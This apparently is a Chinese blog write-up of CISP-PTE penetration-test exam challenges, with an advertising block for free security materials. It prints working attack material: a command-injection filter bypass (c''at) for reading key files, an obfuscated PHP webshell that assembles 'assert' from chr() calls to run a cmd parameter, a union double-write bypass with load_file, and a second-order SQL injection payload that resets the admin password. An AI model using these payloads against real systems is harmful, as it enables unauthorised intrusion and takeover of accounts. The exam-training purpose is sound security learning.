首页 > 其他分享 >记一些CISP-PTE题目解析

记一些CISP-PTE题目解析

时间:2024-05-11 17:23:36浏览次数:30  
标签:php 题目 PTE CISP test key 网安 解析 上传

0x01 命令执行

直接payload: 127.0.0.1 &whoami,发现可以成功执行whoami命令

然后ls ../ ,发现有个key.php文件

尝试用cat命令查看发现不行被拦截了。(其实题目过滤了常用的查看文件的命令)

这里有两种思路,第一种是根据题目意思用命令执行写webshell的方式去进行getshell,第二种方式则是使用linux的命令进行绕过。这里采用第二种方式使用c''at的方式进行绕过。

0x02 基础题目之文件上传突破

可以发现部分上传代码,文件名被命名成一个随机数加上原本的文件名然后md5的值。

直接上传一个带图片头的php木马(会检测是否是图片,所以需要一个GIF89A当图片头),而且过滤了一些敏感函数如eval等。这里直接上传一个免杀的木马即可。

<?php
function go()
{
$func1 = chr(97) . chr(115) . chr(115) . chr(101) . chr(114) .
chr(116);
return $func1;
}
$func1 = go();
$array1 = array($_GET['cmd']);
array_map($func1, $func1 = $array1);
?>

然后接下来就是爆破出shell的地址了,这里我们直接把上传的数据包重放1000次用来提高爆破成功的效率。

【----帮助网安学习,以下所有学习资料免费领!加vx:dctintin,备注 “博客园” 获取!】

 ① 网安学习成长路径思维导图
 ② 60+网安经典常用工具包
 ③ 100+SRC漏洞分析报告
 ④ 150+网安攻防实战技术电子书
 ⑤ 最权威CISSP 认证考试指南+题库
 ⑥ 超1800页CTF实战技巧手册
 ⑦ 最新网安大厂面试题合集(含答案)
 ⑧ APP客户端安全检测指南(安卓+IOS)

用burp的null payload发送1000次

然后设置上传的文件名1.php为前缀,加上随机数的1~99999,最后经过md5加密即可。

设置前缀为1.php (上传的文件名)

然后添加md5

最后就是等待爆破成功。

key在web根目录下的key.php文件

0x03 基础题目之流量分析

下载数据包,使用wireshark发现是http协议居多,首先可以使用wireshark的导出文件查看一下http的访问文件分组。

可以发现攻击者在进行目录爆破。这里可以直接选择

然后根据文件大小排序一下,发现其中有一个压缩包。

但是压缩包设置了密码

然后查找http数据中是否有包含压缩包名字的数据包,其中phpspy.php包含了这个压缩包的名称。

追踪流结果发现Adm1n!是解压密码(%21是url编码)

0x04 代码审计

考点就是让数字绕过is_numerice判断,这里直接使用数字后面跟一个字符串即可绕过。

0x05 基础题目之SQL注入

首先发现题目有一个注册界面,注册账号之后进行登录。

然后再发表文章处发现存在insert注入。

直接抓取数据包使用sqlmap即可

0x06 基础题目之SQL注入

没什么特别的,只是过滤了union关键字这里用双写绕过就可以了, ununionion这样。

然后直接load_file读取文件即可获取key。

0x07 无回显命令执行

很简单,看了一下代码,限制了cmd参数的命令长度而已。可以使用linux的流符号生成一个文件

0x08 二阶SQL注入

二次注入是一种SQL注入攻击的形式,它涉及到用户输入的数据在第一次被存储到数据库中时被错误地处理,导致在后续的查询中,这些原本被转义的数据再次被使用,从而执行恶意命令。

第一步是插入恶意数据:

在第一次插入数据时,开发者可能使用了函数如addslashes过滤了,这时是没有问题的。

比如注册功能:

这里注册一个test'用户 ,由于'被成功转义成了'所以这里是能够正常执行sql语句的。

然后登录test'用户也是没有问题的

但是问题出现再第二次数据库操作中,由于被存入的数据库的用户名是test',那么在第二次系统从数据库中获取用户名的时候如果没有过滤那么就会造成二次注入。

比如更新密码:

系统的语句可能会长这样:

update user set passwd = 'newpasswd' where uname = 'test'' #test'是用户名。那么这种情况就可能导致注入。

那么二次注入怎么利用,这里可以看到需要admin用户登录才能够得到key,那么我们能够用构造一条语重置admin密码就可以了

update user set passwd = 'newpasswd' where uname = 'aaa' or 1 --a'

aaa' or 1 -- a是用户名

用新用户重置admin的密码

再次登录admin

更多网安技能的在线实操练习,请点击这里>>

  

标签:php,题目,PTE,CISP,test,key,网安,解析,上传
From: https://www.cnblogs.com/hetianlab/p/18186823

相关文章

  • 全双工与半双工技术解析及其应用场景
    随着信息技术的迅猛发展,通信系统的性能要求日益提高。在数据传输中,双工模式的选择对于提高系统效率、降低通信延迟具有重要意义。本文将对全双工和半双工两种双工模式进行详细解析,并探讨它们各自的优缺点及适用场景。一、全双工模式全双工模式允许数据在通信链路的两个方向上同......
  • cmd-parser - 一个非常简单好用的命令解析器+EmbedXrpc - 面向单片机的嵌入式小型RPC
    1、EmbedXrpc-面向单片机的嵌入式小型RPCEmbedXrpc类似于Google的gRPC,但是应用场景是单片机。RPC远程调用极大的方便了开发,使得不必关注于协议解析,数据的序列化和反序列化等繁琐的工作。项目主页: https://gitee.com/snikeguo/EmbedXrpcEmbedXrpc应用场景:单片机近距离Clie......
  • 【坑】严重性 代码 说明 项目 文件 行 禁止显示状态 错误 NETSDK1141 无法解析位于 E:
    错误严重性代码说明项目文件行禁止显示状态错误NETSDK1141无法解析位于E:\firefox\WPF-Samples-main\WPF-Samples-main\global.json的global.json中指定的.NETSDK版本。DragDropObjectsC:\ProgramFiles\dotnet\sdk\8.0.202\Sdks\Microsoft.NET.Sdk\targets\M......
  • SomeIP 协议格式解析
    一、SomeIP协议格式//SomeIP协议格式SomeIP{ushortsvcID;//ServiceID;标识出一个服务ushortmthdID;//MethodID;标识出一个方法uintlength;//Length(此字节之后的长度)ushortcliID;//ClientID;客户端ID,区分不同客户端ushortssID;......
  • Java拦截器(Interceptor)详细解析
    转载链接地址:https://www.cnblogs.com/xiaoyh/p/16444681.html一、拦截器概念讲解拦截器的概念之前,我们先看一张图: (1)浏览器发送一个请求会先到Tomcat的web服务器(2)Tomcat服务器接收到请求以后,会去判断请求的是静态资源还是动态资源(3)如果是静态资源,会直接到Tomcat......
  • 这款PDF解析工具,精准触达大模型问答应用的需要
    过去的一年,是大语言模型快速发展的一年。大模型强大的语言理解能力,逐渐让用户习惯了将各类文章丢给大模型,让它来帮忙总结提炼。从产品角度看,这是一次10倍体验的飞跃,意味着巨大的市场机会。也因此,市面上涌现出了大量的文档+大模型的应用。但大多数的开发者普遍都会遇到一个问题,那......
  • 解析 Grand Central Dispatch(GCD)的详细使用方法
    GrandCentralDispatch(GCD)是苹果提供的一种用于管理多线程编程的技术,它提供了一种简单而强大的方式来实现并发任务的调度和执行。本文将详细介绍GCD的使用方法,并提供一些常用的示例。1.DispatchQueue(调度队列)调度队列是GCD中用于管理任务执行的核心概念,它分为两种类型:串......
  • 解析 iOS 中的响应链(Responder Chain)
    在iOS应用程序中,响应链(ResponderChain)是一种重要的事件传递机制,用于处理用户输入和触摸事件。本文将详细讲解什么是响应链,以及它在iOS中的作用和原理。1.什么是响应链?响应链是iOS应用程序中用于处理用户输入和触摸事件的一种事件传递机制。在响应链中,事件会从发生事件的......
  • json在线解析及格式化工具
    JSON可以将程序语言对象中表示的一组数据转换为字符串,然后就可以在网络或者程序之间轻松地传递这个字符串,并在需要的时候将它还原为各编程语言所支持的数据格式,例如在PHP中,可以将JSON还原为数组或者一个基本对象。在用到AJAX时,如果需要用到数组传值,这时就需要用JSON将数组转化......
  • 数仓安全:数据脱敏技术深度解析
    本文分享自华为云社区《GaussDB(DWS)安全管理之数据脱敏原理与使用方法介绍》,作者:VV一笑。1.前言适用版本:8.2.0及以上版本GaussDB(DWS)产品数据脱敏功能,是数据库产品内化和夯实数据安全能力的重要技术突破。提供指定用户范围内列级敏感数据的脱敏功能,具有灵活、高效、透明......